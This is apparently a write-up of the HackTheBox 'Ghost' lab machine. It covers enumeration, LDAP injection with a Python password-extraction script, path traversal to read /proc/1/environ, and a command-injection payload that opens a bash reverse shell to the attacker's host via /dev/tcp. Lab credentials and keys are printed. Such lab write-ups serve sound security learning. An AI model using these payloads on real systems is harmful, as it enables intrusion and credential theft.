> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-ghost.md).

# HTB - GHOST

Ghost is a INSANE rated windows machine.

## Host Enumeration

### NMAP

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-02 03:20:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: ghost.htb, Site: Default-First-Site-Name)
443/tcp   open  https?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: ghost.htb, Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: ghost.htb, Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: ghost.htb, Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8008/tcp  open  http          nginx 1.18.0 (Ubuntu)
8443/tcp  open  ssl/http      nginx 1.18.0 (Ubuntu)
9389/tcp  open  mc-nmf        .NET Message Framing
49443/tcp open  unknown
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49888/tcp open  msrpc         Microsoft Windows RPC
52089/tcp open  msrpc         Microsoft Windows RPC
52313/tcp open  msrpc         Microsoft Windows RPC
```

#### SMB

```bash
──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.231.105 -u '' -p ''                     
SMB         10.129.231.105  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:ghost.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.105  445    DC01             [+] ghost.htb\: 
                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.231.105 -u '' -p '' --shares
SMB         10.129.231.105  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:ghost.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.105  445    DC01             [+] ghost.htb\: 
SMB         10.129.231.105  445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

SMB enumeration was performed using NetExec. Null authentication was accepted by the server, confirming the target as DC01 running Windows Server 2022. However, attempting to list shares with both null and guest credentials returned `STATUS_ACCESS_DENIED` and `STATUS_ACCOUNT_DISABLED` respectively — share enumeration via anonymous access was not possible.

#### DNS

A DNS zone transfer was attempted against the domain but failed.

```bash
┌──(ajay㉿kali)-[~]
└─$ dig axfr @10.129.231.105 ghost.htb

; <<>> DiG 9.20.20-1-Debian <<>> axfr @10.129.231.105 ghost.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
```

#### LDAP

LDAP base enumeration succeeded anonymously, revealing the domain naming contexts:

```bash
┌──(ajay㉿kali)-[~]
└─$ ldapsearch -x -H ldap://ghost.htb -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts 
#

#
dn:
namingContexts: DC=ghost,DC=htb
namingContexts: CN=Configuration,DC=ghost,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=ghost,DC=htb
namingContexts: DC=DomainDnsZones,DC=ghost,DC=htb
namingContexts: DC=ForestDnsZones,DC=ghost,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
```

However, querying user objects without credentials returned an `Operations error`, confirming that anonymous bind was not permitted for directory queries.

## Web Enumeration

### HTTP - 8008

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2vJ0KxGuSZcn3J4bcCMo%2Fimage.png?alt=media&amp;token=3e4c9b86-d455-4793-80ae-cab1634ce885" alt=""><figcaption></figcaption></figure>

The HTTP service on port 8008 hosted a blog-style site. An article authored by **Kathryn Holland** was visible, providing a potential username.

#### DIrectory Bruteforcing

Directory brute-forcing with `dirsearch` returned only standard files (`robots.txt`, `sitemap.xml`, `favicon.ico`).

```bash
──(ajay㉿kali)-[~]
└─$ dirsearch -u http://10.129.231.105:8008/ 
[13:03:39] 200 -   15KB - /favicon.ico
[13:03:43] 301 -    0B  - /html/js/misc/swfupload//swfupload.swf  ->  /html/js/misc/swfupload/swfupload.swf/
[13:03:49] 200 -    1KB - /LICENSE
[13:05:38] 200 -  148B  - /robots.txt
[13:05:42] 200 -  507B  - /sitemap.xml
```

Accessing the robots.txt revealed additional subdomains and accessing them gave me a login page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fr35gBnC7OyI1GLHzTBfq%2Fimage.png?alt=media&amp;token=84924cf4-dae6-4230-b875-8be392cc330a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwazTWxKoGn05BCcqcTQ8%2Fimage.png?alt=media&amp;token=5627a46f-2a9a-44e8-80fb-873bfe15d41c" alt=""><figcaption></figcaption></figure>

#### VHOST Discovery

Fuzzing for virtual hosts on port 8008 revealed an additional subdomain:

```bash
──(ajay㉿kali)-[~]
└─$ ffuf -H "Host:FUZZ.ghost.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.231.105:8008/ -fs 7676

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.231.105:8008/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.ghost.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 7676
________________________________________________

intranet                [Status: 307, Size: 3968, Words: 52, Lines: 1, Duration: 188ms]
```

`intranet.ghost.htb` was added to `/etc/hosts`.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLO9BvIewCsh4rf1CURry%2Fimage.png?alt=media&amp;token=0828654c-7fe4-42e6-a42e-714bec11a9fc" alt=""><figcaption></figcaption></figure>

### HTTPS - 8443

Browsing to the HTTPS service on port 8443 revealed a login page. Clicking through leaked a virtual hostname in the redirect: `federation.ghost.htb`. This was added to `/etc/hosts`.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVylb7mvg1q6dhrty2bzZ%2Fimage.png?alt=media&amp;token=e46839a0-a184-4480-9411-0a13b5d4584e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fz16ul4Q4uk2tKd1pkoVO%2Fimage.png?alt=media&amp;token=5059d2b9-bb2e-44dc-9fd3-3da33cd90f03" alt=""><figcaption></figcaption></figure>

Inspecting the SSL certificate revealed an additional vhost, which was also added. Valid credentials were required to proceed further.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLAs7QCQ5SNI3pZjdH4Ea%2Fimage.png?alt=media&amp;token=7cbfb0a6-fd3f-4359-a672-6b79fd09e291" alt=""><figcaption></figcaption></figure>

`core.ghost.htb` added to `/etc/hosts.`

## Foothold

### LDAP Injection - intranet.ghost.htb

The intranet login form submitted credentials via POST using the fields `1_ldap-username` and `1_ldap-secret`, indicating LDAP-backed authentication.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlH3IgfjSn4r1TjVLQxZc%2Fimage.png?alt=media&amp;token=e6e21318-a3a2-4daa-af7c-5df2a4c32cd3" alt=""><figcaption></figcaption></figure>

Since the credentials are passed directly to an LDAP query, try can classic LDAP injection payloads in the username field.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNxPC8CaCf7HgRUyccYz2%2Fimage.png?alt=media&amp;token=43ad71d0-79b6-4c30-a008-800dcce49b11" alt=""><figcaption></figcaption></figure>

Sending wrong credentails result in invalid combination.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fh45a4coQ674y0ThhkezJ%2Fimage.png?alt=media&amp;token=367a5b56-a4a0-4afe-9821-5492309e9a9e" alt=""><figcaption></figcaption></figure>

Testing standard LDAP injection payloads showed that submitting `*` in both the username and password fields matched all users and returned a valid JWT token — belonging to `kathryn.holland`.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYCLO5qGKK1vD06zJXHuP%2Fimage.png?alt=media&amp;token=8de97b67-9bb8-4742-ac2a-3272a7c5ddc7" alt=""><figcaption></figcaption></figure>

With the injection paylaods got access to the gitea instance ( `gitea.ghost.htb` )

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGj3iagZst54vZJpXoaFR%2Fimage.png?alt=media&amp;token=0415c33c-5172-4be6-9686-00c3e7dbc916" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiWI6mWa50A4KbIhbbB1G%2Fimage.png?alt=media&amp;token=85ffe00e-28c3-4a6b-8941-9332e7f7fe7f" alt=""><figcaption></figcaption></figure>

With additional usernames sourced from the Gitea instance, Kerbrute confirmed 11 valid domain accounts

```bash
┌──(ajay㉿kali)-[~/Tools]
└─$ ./kerbrute_linux_amd64 userenum -d ghost.htb --dc 10.129.231.105 ~/users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/02/26 - Ronnie Flathers @ropnop

2026/06/02 14:06:03 >  Using KDC(s):
2026/06/02 14:06:03 >   10.129.231.105:88

2026/06/02 14:06:03 >  [+] VALID USERNAME:       intranet_principal@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       charles.gray@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       justin.bradley@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       florence.ramirez@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       kathryn.holland@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       cassandra.shelton@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       arthur.boyd@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       beth.clark@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       robert.steeves@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       jason.taylor@ghost.htb
2026/06/02 14:06:03 >  [+] VALID USERNAME:       gitea_temp_principal@ghost.htb
2026/06/02 14:06:03 >  Done! Tested 11 usernames (11 valid) in 0.147 seconds
```

AS-REP roasting was attempted against all accounts — none were vulnerable.

```bash
──(ajay㉿kali)-[~/Tools]
└─$ impacket-GetNPUsers ghost.htb/ -usersfile ~/users.txt -no-pass -dc-ip 10.129.231.105       
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[-] User kathryn.holland doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User cassandra.shelton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robert.steeves doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User florence.ramirez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User justin.bradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arthur.boyd doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User beth.clark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User charles.gray doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jason.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User intranet_principal doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gitea_temp_principal doesn't have UF_DONT_REQUIRE_PREAUTH set
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1SWEOkXJjry2XrwGyWXz%2Fimage.png?alt=media&amp;token=0dddc5b0-920f-4bb1-b599-59d2e608cd93" alt=""><figcaption></figcaption></figure>

Found another vhost in the forums section of the instance which speaks about conenction issue with `bitbucket.ghost.htb.`

The LDAP injection vulnerability was further abused to brute-force the password for `gitea_temp_principal` character by character, using wildcard matching in the password field.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjiGTqerOp9Om1CbUC8eg%2Fimage.png?alt=media&amp;token=903ef26b-3c93-4e15-a34b-61d5c2f50572" alt=""><figcaption></figcaption></figure>

Auth gitea\_temp\_principal also bypassed using ldap injection and gave me the JWT toke. so i went on to brute force the password for gitea\_temp\_principal user using the below python script.

```python
import requests
import string

url = "http://intranet.ghost.htb:8008/login"
headers = {
    "Next-Action": "c471eb076ccac91d6f828b671795550fd5925940",
    "Accept": "text/x-component",
}

def try_login(username, password):
    files = {
        "1_$ACTION_REF_1": (None, ""),
        '1_$ACTION_1:0': (None, '{"id":"c471eb076ccac91d6f828b671795550fd5925940","bound":"$@1"}'),
        '1_$ACTION_1:1': (None, '[{}]'),
        '1_$ACTION_KEY': (None, 'k2982904007'),
        '1_ldap-username': (None, username),
        '1_ldap-secret': (None, password),
        '0': (None, '[{},"$K1"]'),
    }
    r = requests.post(url, headers=headers, files=files, allow_redirects=False)
    return r.status_code == 303

# Bruteforce the secret for gitea_temp_principal
charset = string.ascii_letters + string.digits + "!@#$%^&*-_+="
user = "gitea_temp_principal"
known = ""

print(f"[*] Extracting password for {user}...")

while True:
    found = False
    for c in charset:
        attempt = known + c + "*"
        if try_login(user, attempt):
            known += c
            print(f"  [+] Progress: {known}*")
            found = True
            break
    if not found:
        # Verify it's the complete password (no wildcard)
        if try_login(user, known):
            print(f"\n[DONE] {user}:{known}")
        else:
            print(f"\n[?] Incomplete or special char hit. Got so far: {known}")
        break
```

```python
──(ajay㉿kali)-[~]
└─$ python3 ldap_brute_force.py 
[*] Extracting password for gitea_temp_principal...
  [+] Progress: s*
  [+] Progress: sz*
  [+] Progress: szr*
  [+] Progress: szrr*
  [+] Progress: szrr8*
  [+] Progress: szrr8k*
  [+] Progress: szrr8kp*
  [+] Progress: szrr8kpc*
  [+] Progress: szrr8kpc3*
  [+] Progress: szrr8kpc3z*
  [+] Progress: szrr8kpc3z6*
  [+] Progress: szrr8kpc3z6o*
  [+] Progress: szrr8kpc3z6on*
  [+] Progress: szrr8kpc3z6onl*
  [+] Progress: szrr8kpc3z6onlq*
  [+] Progress: szrr8kpc3z6onlqf*

[DONE] gitea_temp_principal:szrr8kpc3z6onlqf
```

\[`DONE] gitea_temp_principal:szrr8kpc3z6onlqf`

### Gitea.ghost.htb

using the creds got access to the gitea instance.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPABEdIpR7cDn8N7PrlVS%2Fimage.png?alt=media&amp;token=917a2921-ecd8-4d17-8658-07274a55ca49" alt=""><figcaption></figcaption></figure>

Logging into Gitea as `gitea_temp_principal` revealed two repositories: `ghost-dev/blog` and `ghost-dev/intranet`.

#### Ghost-dev/blog

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiKap8OC38k08dEIeXygt%2Fimage.png?alt=media&amp;token=ac353550-d666-4f69-a160-3f7243048758" alt=""><figcaption></figcaption></figure>

There is an `API_KEY` which is shared between intranet and Ghost CMS and stored as environment variable called `DEV_INTRANET_KEY`.

Also the readme file leaked a API Key :`a5af628828958c976a3b6cc81a`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjNEH2XgebxdzaHArVQ7k%2Fimage.png?alt=media&amp;token=be9ea61b-3391-4788-a0cb-95065c4e97e7" alt=""><figcaption></figcaption></figure>

The docker-compose.yml file leaks addtional data where the backend databse is sqlite3 and also the env variable `DEV_INTRANET_KEY` is redacted.

Also, `posts-public.js` is a modified source code of added features.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6hR2b01penFkyCBsbEwB%2Fimage.png?alt=media&amp;token=267491aa-bf46-45c9-80d8-c3417f22d4aa" alt=""><figcaption></figcaption></figure>

Examining the `posts-public.js` file following is identified.\
The extra query parameter is appended directly to /var/lib/ghost/extra/ with no sanitization.\
Path traversal with `../` lets you read arbitrary files. `fs.existsSync(extra`) checks the raw extra value as a path, but readFileSync prepends the base dir so you need a path that exists both ways, or just use absolute-looking traversal.

#### Ghost-dev/intranet

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Foor01dT0L6lNwVa5We2X%2Fimage.png?alt=media&amp;token=aeb5a4d9-74da-494a-a2ef-dd8d7dafc2e5" alt=""><figcaption></figcaption></figure>

readme leaked an api endpoint at `http://intranet.ghost.htb/api-dev`

Authentication middleware (`dev.rs`) requiring a custom header `X-DEV-INTRANET-KEY` validated against the `DEV_INTRANET_KEY` environment variable

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FteNQtr4yP6RqIVBRQZys%2Fimage.png?alt=media&amp;token=4b8590e2-1673-4604-8fe1-d54bb9d35cc3" alt=""><figcaption></figcaption></figure>

there is a `scan.rs` in the api/dev

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtVEYXZoR6Br2jZyVMYV6%2Fimage.png?alt=media&amp;token=b09797a6-7db8-43f5-bd48-69e05f551832" alt=""><figcaption></figcaption></figure>

\#\[post] is Rocket's attribute macro that explicitly registers this route as POST only.A GET request would return 404.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FudX1jXJNeKaRjb9Do0lu%2Fimage.png?alt=media&amp;token=24325b0c-6e88-4c7d-a8d0-a4e8edb054a0" alt=""><figcaption></figcaption></figure>

The url field is passed directly to bash -c with no sanitization Injecting ; or && breaks out of the command entirely.

#### Recovering DEV\_INTRANET\_KEY

Ghost content API endpoint is located at `/ghost/api/content/posts/.` and environment variables are stored at `/proc/1/environ` in linux.

```bash
┌──(ajay㉿kali)-[~]
└─$ curl -s "http://ghost.htb:8008/ghost/api/content/posts/"
{"errors":[{"message":"Authorization failed","context":"Unable to determine the authenticated member or integration. Check the supplied Content API Key and ensure cookies are being passed through if member auth is failing.","type":"NoPermissionError","details":null,"property":null,"help":null,"code":null,"id":"3f78d440-5eb9-11f1-8d00-816343f9d7fb","ghostErrorCode":null}]}
```

requires an api key. which we already got through the git repo

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpwBlZ0ZlNDnQGzOx6LV8%2Fimage.png?alt=media&amp;token=3ee086df-0709-44da-bfb7-3b91063f86f7" alt=""><figcaption></figcaption></figure>

from the repo we know there is an extra parameter added which is vulnerable to path traversal.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FT8x25MjM3R4wdZpYgkPQ%2Fimage.png?alt=media&amp;token=baa3deb5-6d99-4cb0-a27d-6bbce432e041" alt=""><figcaption></figcaption></figure>

Only 3 ../ — that resolves to /var/lib/proc/1/environ which doesn't exist. Need one more ../ to reach root.

```bash
──(ajay㉿kali)-[~]
└─$ curl -s "http://ghost.htb:8008/ghost/api/content/posts/?key=a5af628828958c976a3b6cc81a&extra=../../../../proc/1/environ" | jq .
{
  "posts": [
    {
      "id": "65bdd2dc26db7d00010704b5",
      "uuid": "22db47b3-bbf6-426d-9fcf-887363df82cf",
      "title": "Embarking on the Supernatural Journey: Welcome to Ghost!",
      "slug": "embarking-on-the-supernatural-journey-welcome-to-ghost",
      "html": "<p>Greetings, fellow seekers of the unknown!</p><p>It is with great excitement and a touch of trepidation that we welcome you to the digital realm of Ghost, your go-to destination for unraveling the mysteries that lie beyond the veil of the ordinary. As we embark on this supernatural journey together, allow us to extend our hand and guide you through the shadowy corridors of the unexplained.</p><h2 id=\"why-ghost\">Why Ghost?</h2><p>The quest to understand the supernatural has been etched into the fabric of human history. From ancient legends to modern-day tales, the fascination with ghosts and the paranormal is a thread that binds us across time and cultures. Ghost emerges as a beacon for those who yearn to explore the realms beyond our comprehension.</p><h2 id=\"what-to-expect\">What to Expect</h2><p>Our digital abode is more than just a collection of stories; it's a haven for the curious, the intrepid, and the inquisitive. Here, you'll find:</p><ol><li><strong>Investigative Chronicles</strong>: Join us as we recount our journeys into haunted locations, sharing the spine-chilling encounters, unexplained phenomena, and the secrets that linger in the darkness.</li><li><strong>Tech Tuesdays</strong>: Stay at the forefront of paranormal research with our weekly dives into the latest ghost-hunting gadgets, software, and techniques. Knowledge is our strongest ally in the face of the unknown.</li><li><strong>Spotlight Series</strong>: Get to know the passionate individuals behind the investigations. Our Spotlight Series puts a face to the name, sharing the stories and expertise of our dedicated team.</li><li><strong>Community Corner</strong>: Ghost is more than a website; it's a community. Share your own supernatural experiences, theories, and questions in our Community Corner. Together, we amplify the voices seeking to understand the inexplicable.</li></ol><h2 id=\"join-us-on-this-extraordinary-expedition\">Join Us on this Extraordinary Expedition</h2><p>The journey into the paranormal is not for the faint of heart, but it is a journey worth taking. As we lift the veil on the mysteries that surround us, we invite you to be an active participant in this extraordinary expedition. Engage with our content, share your thoughts, and let the spirit of exploration guide us into uncharted territories.</p><p>Ghost is not just a website; it's a portal to the enigmatic, a gateway to the supernatural, and a testament to the boundless curiosity that defines the human spirit.</p><p>Welcome to our realm. Let the haunting begin!</p><p>Happy ghost hunting,</p><p>The Ghost Team</p>",
   "prev": null
    },
    "extra": {
      "../../../../proc/1/environ": "HOSTNAME=26ae7990f3dd\u0000database__debug=false\u0000YARN_VERSION=1.22.19\u0000PWD=/var/lib/ghost\u0000NODE_ENV=production\u0000database__connection__filename=content/data/ghost.db\u0000HOME=/home/node\u0000database__client=sqlite3\u0000url=http://ghost.htb\u0000DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe\u0000database__useNullAsDefault=true\u0000GHOST_CONTENT=/var/lib/ghost/content\u0000SHLVL=0\u0000GHOST_CLI_VERSION=1.25.3\u0000GHOST_INSTALL=/var/lib/ghost\u0000PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\u0000NODE_VERSION=18.19.0\u0000GHOST_VERSION=5.78.0\u0000"                                                                                        
    }
  }
}
```

Got the `DEV_INTRANET_KEY`. Adding more filtering to the command to display the output properly.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHvEveu2XoLc9OkEVGUjN%2Fimage.png?alt=media&amp;token=cd4dad7f-02a2-438d-b0f1-cb9acc146a21" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fix9D2CI490HIZvnhqlvo%2Fimage.png?alt=media&amp;token=2a5d737f-b8a7-4bde-808e-57dd6485aa31" alt=""><figcaption></figcaption></figure>

there is an api-dev at `intranet.ghost.htb` but accesing it says its moved permanently.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGNdriQMIVKunEpkemT3V%2Fimage.png?alt=media&amp;token=ab0a1513-44ca-4c84-8ec6-264b3f44ec4e" alt=""><figcaption></figcaption></figure>

## Shell as Root

i still have the command injection vulnerability in the scan.rs which i can exploit.

{"url": "something"}

the server expects the above to scan it but the url is passed directly without any filtering. so we an use this to create a payload to get a reverse shell on our listener.

```bash
KEY='!@yqr!X2kxmQ.@Xe'
curl -s -X POST "http://intranet.ghost.htb:8008/api-dev/scan" \
  -H "Content-Type: application/json" \
  -H "X-DEV-INTRANET-KEY: $KEY" \
  -d '{"url": "test; bash -i >& /dev/tcp/10.10.15.204/4444 0>&1"}'
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuVzP1WZvUbp0zbuBtIdu%2Fimage.png?alt=media&amp;token=8bc81ea9-e847-4d0d-8f3b-1b0dfd94fc28" alt=""><figcaption></figcaption></figure>

get a stable shell.

```wasm
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg
```

The shell landed inside the intranet Docker container running as root. Inspecting the container's environment variables revealed LDAP bind credentials:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPFZ1lyrInlLg3wp7h9Qu%2Fimage.png?alt=media&amp;token=aeec6248-91be-487a-a92e-101f661a6959" alt=""><figcaption></figcaption></figure>

```
LDAP_BIND_DN=CN=Intranet Principal,CN=Users,DC=ghost,DC=htb
LDAP_HOST=ldap://windows-host:389
LDAP_BIND_PASSWORD=He!KA9oKVT3rL99j
JWT_SECRET=*xopkAGbLyg9bK_A
```

From the root shell on the container, an active SSH ControlMaster socket was discovered:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F94kagWJ2cNVU0uwBjNYY%2Fimage.png?alt=media&amp;token=27410359-c8d0-4721-8481-7fdfc1a65404" alt=""><figcaption></figcaption></figure>

There's an active SSH ControlMaster socket for <florence.ramirez@ghost.htb> connected to dev-workstation:22. We can use that to get a ssh connection as florence.

## Shell as Florence.ramirez

```bash
ssh -S "/root/.ssh/controlmaster/florence.ramirez@ghost.htb@dev-workstation:22" florence.ramirez@dev-workstation
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQwmz1QV6k7II59iAvui9%2Fimage.png?alt=media&amp;token=7f080f94-8ca7-4be0-a1ba-6aa86aa1a645" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOYIUsXFksvnXggb1tHv0%2Fimage.png?alt=media&amp;token=a1003840-4160-4a1f-b48b-722c8aed4588" alt=""><figcaption></figcaption></figure>

Florence has a kerberos ticket present at `/tmp/krb5cc_50`

